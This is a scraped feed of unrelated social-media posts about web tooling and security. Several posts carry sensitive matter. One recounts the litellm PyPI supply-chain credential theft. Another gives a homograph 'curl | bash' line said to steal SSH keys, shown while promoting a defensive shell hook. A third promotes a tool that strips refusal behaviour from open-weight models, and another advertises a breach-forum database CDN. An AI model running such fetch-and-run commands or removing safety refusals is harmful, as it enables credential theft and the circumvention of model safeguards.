VBAnimal

A critical 9.8 CVSS zero-click flaw (ZDI-CAN-30207) hits Telegram, affecting 1 billion users. No interaction needed for full system hijack. Patching now! #Telegram #CyberSecurity #ZeroClick #InfoSec #ZDI #Vulnerability #Privacy #ZeroDay #DigitalPrivacy securityonline.info/telegram-criti…

@felixrieseberg @vite_js @tan_stack Why not pinia? Too recent for the IA to master well ? pinia.vuejs.org

A small ship I love: We made Claude.ai and our desktop apps meaningful faster this week. We moved our architecture from SSR to a static @vite_js & @tan_stack router setup that we can serve straight from workers at the edge. Time to first byte is down 65% at p75, prompts show up 50% sooner, navigation is snappier. We're not done (not even close!) but we care and we'll keep chipping away. Aiming to make Claude a little better every day.

Introducing TurboQuant: Our new compression algorithm that reduces LLM key-value cache memory by at least 6x and delivers up to 8x speedup, all with zero accuracy loss, redefining AI efficiency. Read the blog to learn how it achieves these results: goo.gle/4bsq2qI

Software horror: litellm PyPI supply chain attack. Simple `pip install litellm` was enough to exfiltrate SSH keys, AWS/GCP/Azure creds, Kubernetes configs, git credentials, env vars (all your API keys), shell history, crypto wallets, SSL private keys, CI/CD secrets, database passwords. LiteLLM itself has 97 million downloads per month which is already terrible, but much worse, the contagion spreads to any project that depends on litellm. For example, if you did `pip install dspy` (which depended on litellm>=1.64.0), you'd also be pwnd. Same for any other large project that depended on litellm. Afaict the poisoned version was up for only less than ~1 hour. The attack had a bug which led to its discovery - Callum McMahon was using an MCP plugin inside Cursor that pulled in litellm as a transitive dependency. When litellm 1.82.8 installed, their machine ran out of RAM and crashed. So if the attacker didn't vibe code this attack it could have been undetected for many days or weeks. Supply chain attacks like this are basically the scariest thing imaginable in modern software. Every time you install any depedency you could be pulling in a poisoned package anywhere deep inside its entire depedency tree. This is especially risky with large projects that might have lots and lots of dependencies. The credentials that do get stolen in each attack can then be used to take over more accounts and compromise more packages. Classical software engineering would have you believe that dependencies are good (we're building pyramids from bricks), but imo this has to be re-evaluated, and it's why I've been so growingly averse to them, preferring to use LLMs to "yoink" functionality when it's simple enough and possible.

@aaryan_kakad @0xSero Does not work at all on mobile.

@0xSero theneuralforge.online this ui is oneshotted using gpt5.4high

This is for all the frontend/fullstack devs, it'll make your life easier. Do you want GPT-5.4 & mini to make better UIs? No amount of prompting is going to fix the issue, the model simply is not good enough at frontend design on it's own. I love it, just not fro UI. 1. Go on ui.shadcn.com 2. Go through their UI builder 3. Click "Copy Command" 4. Run it Voila, GPT now uses an expert crafted UI-component kit to build you any UI with perfect consistency. All free and open source btw.

🧵 I just reverse-engineered the binaries inside Claude Code's Firecracker MicroVM and found something wild: Anthropic is building their own PaaS platform called "Antspace" (Ants + Space). It's a full deployment pipeline — hidden in plain sight inside the environment-runner binary. Here's what I found 👇

@blackroomsec The man is senior and does not know WSL?

Yeah, the org dodged a bullet with this one. I know it's been really popular for the younger generations to think it's cool to go around spewing their personal opinions at work but Corporate America has not changed in any way just because you happen to be alive. No one wants to hear your opinion, unless they ask for it. Which means you absolutely should not give it unless you are asked.🙄 And, if you are being given a standard issue laptop and aren't in any way responsible for the decisions that go behind purchasing those laptops then that's a good bet that nobody at work cares about your opinion because it doesn't matter and you're not that important in that particular org's food chain. And that's really the crux of it right? People like this thinking that they are more important then everybody else. That the rules don't apply to them. The IT staff isn't lazy. HR is not there to serve you but the company. Check your attitude and arrogance at the door. I would especially not be giving anyone an attitude in today's job climate because that's just insane. You're lucky you even GOT a job offer, let alone an actual job. READ THE ROOM,KID, SIT ALL THE WAY DOWN AND SHUT ALL THE WAY UP. As far as Windows is concerned it holds over 95% of the market share of all computers on Earth. 10 times out of 10 the computers are going to be Windows whether you personally agree with that or not. No one is going to change to Linux or a Mac for you. Macs are also very expensive computers and the org isn't going to buy 5,000 of them because of that. It's a budgetary decision and a sane one. Try to be a little self aware and ask yourself why all of these organizations aren't putting Macs on every desk and maybe consider that a lot of other people smarter than you, older than you and who have been working longer than you, have run the numbers and realized it just doesn't pay in the long run. That doesn't mean that the Mac is a bad computer. It isn't. It's a great computer. But it's really expensive. It would be really great if every organization I ever worked for would serve me lobster everyday but the reality is they're not going to do that because it's an expensive lunch. And even at the highest levels I got a ham sandwich if I was lucky. The only reason that I was going out to expensive dinners every week with my boss in my last role is because he was personally paying for it. You're also supposed to be putting your best foot forward and not embarrassing yourself with your own ignorance. So in closing check yourself when you get a job and stop thinking that the world revolves around you because it doesn't.

someone built a tool that REMOVES censorship from ANY open-weight LLM with a single click 13 abliteration methods, 116 models, 837 tests, and it gets SMARTER every time someone runs it its called OBLITERATUS it finds the exact weights that make the model refuse and surgically removes them, full reasoning stays intact, just the refusal disappears 15 analysis modules map the geometry of refusal BEFORE touching a single weight, it can even fingerprint whether a model was aligned with DPO vs RLHF vs CAI just from subspace geometry alone then it cuts, the model keeps its full brain but loses the artificial compulsion to say no every time someone runs it with telemetry enabled their anonymous benchmark data feeds a growing community dataset, refusal geometries, method comparisons, hardware profiles at a scale no single lab could build

State of security in Kali integrating AI ( kali.org/tools/mcp-kali… ): arguments are interpolated in a single command string, not escaped, so whatever the AI passes, including potential vectors for command injection, is executed. With pipes, &, ; and all that stuff like it's 1998. 🚀

The Breachforums CDN was just released We tested downloads with multiple files and large files and speeds are good However if you are a db collector, the downloads on offer are mostly the same old 2015 - 2023 official db from RaidForums and BreachForums. Hoping they add more exclusive and new db over time

@SeoClement Nextjs + Astro ? Pas compris. Y'a 2 apps?

Il m'aura fallu 8h pour migrer le site WP éclaté de ma daronne (avec plugins lents, failles etc) vers Nextjs + Astro en mode SEO programmatique, et super rapide.

@conar_app Ducon would work well ! :troll:

And now let's get serious. Guys, we came up with the name randomly just so it would sound cool. Of course, we didn't check how it sounds in French. It was still a POC. Now thousands of people are using our app, but the name remains the same for many reasons. When we have the resources to change the name and buy a cool domain, we'll take care of it.

Can LNK files ever be trusted? ⚡ My latest blog post demonstrates several new LNK abuse methods, allowing you to fully spoof the target shown in Explorer. It also introduces tools to create your own LNKs, and detected spoofed ones yourself. 🐬 wietzebeukema.nl/blog/trust-me-…

@techNmak OAT looks broken on mobile. Guess I have my answer.

@techNmak How does it compare with picocss.com?

Found a UI library that made me mass mass mass mass mass angry. Angry that this isn't how everything works. Oat: → 6KB CSS + 2.2KB JS → Zero dependencies → No framework required → No build step → Semantic HTML only You write . It looks good. You write

. It looks good. You write . It looks good. No className="px-4 py-2 rounded-md bg-blue-500" No

Just HTML. Accessible. Keyboard navigable. Dark mode included. Built by Kailash Nadh (CTO @ Zerodha)

@siblingpastry Hello. Would love to read vispero.com/resources/the-… but the website seems down. Any chance you can have a look? Regards!

Be honest. When was the last time you actually read a command before pasting it into your terminal? Because these two lines look identical: curl -sSL https://install.example-cli | bash curl -sSL https://іnstall.example-clі | bash One installs your tool. The other steals your SSH keys. That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink. Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything. So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry. github.com/sheeki03/tirith

@grok @EricaZelic @MyLLMnews @i_love_profit @xinqiu_bot @FollowBot_F4F @followbot @FollowBot_F4F

@grok mention 30 accounts that look automated so they can read my post.

@grok Can you tag some account that looks automated under this so they read ?